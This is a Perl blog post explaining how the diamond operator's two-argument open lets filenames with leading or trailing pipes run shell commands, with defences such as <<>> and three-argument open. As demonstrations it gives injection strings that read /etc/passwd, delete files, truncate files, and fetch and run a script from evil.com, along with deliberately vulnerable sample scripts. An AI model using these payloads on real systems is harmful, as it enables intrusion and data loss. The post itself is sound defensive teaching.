perl.gg / hidden-gems

<!-- category: hidden-gems -->

The Diamond Operator Is a Shell Injection Vector

2026-04-25

The most common Perl input idiom is secretly a security hole.
while (<>) { chomp; process($_); }
That's the diamond operator. Reads from files listed in @ARGV, or STDIN if there are none. Every Perl tutorial teaches it. Every sysadmin uses it. And if a user can control the filenames, they can execute arbitrary shell commands through it.

No eval. No system. No backticks. Just <>.

Part 1: HOW <> PROCESSES @ARGV

When you write <>, Perl iterates through @ARGV and opens each element as a filename. If @ARGV is empty, it reads STDIN. Simple enough.
$ echo "hello" > greeting.txt
$ perl -e 'print while <>' greeting.txt
hello
But the way Perl opens those filenames is the problem. It uses the two-argument form of open internally. Not the safe three-argument form. The two-argument form.
# What <> does internally (simplified):
for my $file (@ARGV) {
    open my $fh, $file;    # TWO-argument open!
    while (<$fh>) {
        # process
    }
    close $fh;
}
Two-argument open is a whole different beast from three-argument open. It interprets special characters in the filename.

Part 2: THE TWO-ARGUMENT OPEN LURKING INSIDE

Two-argument open treats certain characters as I/O instructions, not as part of the filename:
open my $fh, "file.txt";      # reads file.txt
open my $fh, "<file.txt";     # reads file.txt (explicit input)
open my $fh, ">file.txt";     # WRITES to file.txt (truncates!)
open my $fh, ">>file.txt";    # APPENDS to file.txt
open my $fh, "| command";     # pipes TO a command
open my $fh, "command |";     # pipes FROM a command
Those last two are the dangerous ones. A leading or trailing pipe character turns a "filename" into a shell command.

And <> passes every element of @ARGV through two-argument open.

Part 3: FILENAMES STARTING WITH PIPE EXECUTE COMMANDS

If someone passes a filename that starts with |, Perl interprets it as "pipe output to this command":
# malicious_script.pl
use feature 'say';

while (<>) {
    chomp;
    say "Processing: $_";
}
$ perl malicious_script.pl "| echo PWNED > /tmp/proof"
That doesn't try to open a file called | echo PWNED > /tmp/proof. It runs echo PWNED > /tmp/proof as a shell command. Check /tmp/proof and you'll find the word PWNED sitting there.

The <> operator happily executed a shell command because the "filename" started with a pipe. Your script didn't intend to run commands. It just wanted to read files. But two-argument open doesn't care about your intentions.
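To reproduce this without leaving files in /tmp, here's a self-contained version that stages the proof in a throwaway directory (assumes perl and mktemp are available):

```shell
tmp=$(mktemp -d)

# The "filename" is a leading-pipe attack string; <> hands it to
# two-argument open, which forks a shell and runs the command.
perl -e 'while (<>) { print }' "| echo PWNED > $tmp/proof"

cat "$tmp/proof"    # prints: PWNED
rm -rf "$tmp"
```

The while loop itself prints nothing, because the pipe was opened for writing. The command still ran.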

Part 4: FILENAMES ENDING WITH PIPE EXECUTE TOO

A trailing pipe is even nastier. It means "run this command and read its output":
$ perl -e 'print while <>' "cat /etc/passwd |"
That runs cat /etc/passwd and feeds the output through <> as if it were file contents. Your script reads what looks like file data, but it's actually command output.

More dangerous:

$ perl -e 'print while <>' "rm -rf /tmp/important_stuff |"
That runs the rm command. The output of rm (nothing, usually) gets read by your script. But the damage is done. The files are gone.

Your Perl script just became a remote code execution vector.

Part 5: A PRACTICAL DEMONSTRATION

Let's see this clearly. Here's a script that "safely" processes log files:
#!/usr/bin/env perl
use strict;
use warnings;
use feature 'say';

# "Safely" count lines in each file
my $total = 0;
while (<>) {
    $total++;
}
say "Total lines: $total";
Normal usage:
$ perl linecount.pl access.log error.log
Total lines: 4521
Malicious usage:
$ perl linecount.pl "ls /etc |"
Total lines: 47
The script happily counted the output lines of ls /etc instead of reading a file. The user ran an arbitrary command through your script.

Now imagine this script runs as a cron job that processes filenames from a database. Or a web application that takes filenames from user input. Or a sysadmin tool that processes files from a config file that someone else can edit.

Part 6: THE <<>> DOUBLE DIAMOND FIX

Perl 5.22 introduced the double diamond operator <<>>. It does everything <> does, but uses three-argument open internally. Special characters in filenames are treated as literal characters, not as I/O instructions.
#!/usr/bin/env perl
use strict;
use warnings;
use feature 'say';

# SAFE version
while (<<>>) {
    chomp;
    say "Line: $_";
}
$ perl safe_script.pl "| echo PWNED"
Can't open | echo PWNED: No such file or directory
The double diamond tried to open a file literally named | echo PWNED. No command execution. No shell involvement. Just a clean error message.

If you're on Perl 5.22 or later (you should be), use <<>> instead of <>. Always. There is no reason to use single diamond when processing filenames from @ARGV.
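A side-by-side sketch makes the difference concrete. Same attack string, both operators (assumes perl 5.22+, since <<>> is a syntax error on older perls):

```shell
# Same attack string against both operators; only <> executes it.
tmp=$(mktemp -d)

perl -e 'while (<>)   { print }' "| touch $tmp/single" 2>/dev/null
perl -e 'while (<<>>) { print }' "| touch $tmp/double" 2>/dev/null || true

ls "$tmp"    # shows only "single"
rm -rf "$tmp"
```

The single diamond ran touch; the double diamond failed to open the "filename" and created nothing.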

Part 7: DEFENDING EXISTING CODE

What if you can't upgrade to <<>> or you're maintaining legacy code? Several defenses:

Defense 1: Validate @ARGV before using <>

for my $file (@ARGV) {
    if ($file =~ m~[|<>]~ || !-f $file) {
        die "Invalid filename: $file\n";
    }
}
while (<>) {
    # now safe
}
Defense 2: Use three-argument open explicitly
for my $file (@ARGV) {
    open my $fh, '<', $file or do {
        warn "Cannot open $file: $!\n";
        next;
    };
    while (<$fh>) {
        chomp;
        process($_);
    }
    close $fh;
}
Three-argument open with the explicit < mode is always safe. The filename is treated as a literal string. No pipe interpretation. No special characters. This is the gold standard.

Defense 3: Use ARGV::readonly from CPAN

use ARGV::readonly;

while (<>) {
    # @ARGV entries are sanitized
}
The module sanitizes each element of @ARGV at load time, escaping it so that two-argument open can only treat it as a literal file to read. Drop-in fix for existing code.

Part 8: WHY THIS MATTERS FOR SYSADMIN SCRIPTS

Sysadmin scripts are the highest-risk category. They often run unattended, run with elevated privileges, and take their filenames from sources other people can influence.

A script written in 2005 that uses <> to process log files might still be running in production today. If an attacker can influence the filenames it processes (through a config file, a database, a web form, a symlink attack), they have code execution.

#!/usr/bin/env perl
# Typical sysadmin pattern (VULNERABLE)
use strict;
use warnings;

# Process whatever files the config tells us to
my @files = read_config("/etc/myapp/files.conf");
@ARGV = @files;

while (<>) {
    # process log entries
}
If someone can write to files.conf, they own your server. One line like | curl http://evil.com/backdoor.sh | bash in that config file and game over.

Fix:

# SAFE version
for my $file (@files) {
    open my $fh, '<', $file or do {
        warn "Skipping $file: $!\n";
        next;
    };
    while (<$fh>) {
        # process log entries
    }
    close $fh;
}

Part 9: OTHER SNEAKY FILENAMES

Pipes aren't the only danger. Two-argument open also interprets:
FILENAME          WHAT HAPPENS
">/etc/passwd"    Truncates /etc/passwd (if permissions allow)
">>/tmp/log"      Appends to /tmp/log
"+<file"          Opens file for read/write
"-"               Reads from STDIN (can cause hangs)
""                Empty string; reads STDIN on some systems
A filename of >important.dat passed through <> will truncate that file. Not read it. Truncate it. Data gone.

Even the humble - is dangerous in automated contexts. If your cron job passes - as a filename, the script hangs forever waiting for STDIN input that will never come.

The double diamond <<>> handles all of these correctly. Every filename is literal. No interpretation. No surprises.

Part 10: THE RULE

The rule is simple:
+------------------------------------------+
|                                          |
|  <> is for quick one-liners where YOU    |
|  control the arguments.                  |
|                                          |
|  <<>> is for scripts where ANYONE        |
|  might control the arguments.            |
|                                          |
|  Three-argument open is for when you     |
|  want to be absolutely sure.             |
|                                          |
+------------------------------------------+

   .--.
  |o_o |     "Two-argument open trusts
  |:_/ |      the filename. The filename
 //   \ \     doesn't deserve that trust."
(|     | )
/'\_   _/`\
\___)=(___/
The diamond operator is convenient. It's elegant. It's the Perl way to process files from the command line. And it has a shell injection vulnerability baked into its implementation.

Know the risk. Use <<>> or three-argument open. Validate your inputs. Every sysadmin script that processes filenames from untrusted sources should be audited for this. Today. Not tomorrow.

If you grep your codebase for while (<>) and find matches in scripts that process external filenames, you have homework to do.
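A starting point for that audit, sketched with GNU grep (the --include flag is a GNU extension; the sample file here is only for illustration):

```shell
# Fixed-string (-F) search, so the angle brackets need no escaping.
tmp=$(mktemp -d)
printf 'while (<>) { count() }\n' > "$tmp/legacy.pl"

grep -rnF 'while (<>)' --include='*.pl' --include='*.pm' "$tmp"
rm -rf "$tmp"
```

Every hit is a candidate for <<>> or an explicit three-argument open.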
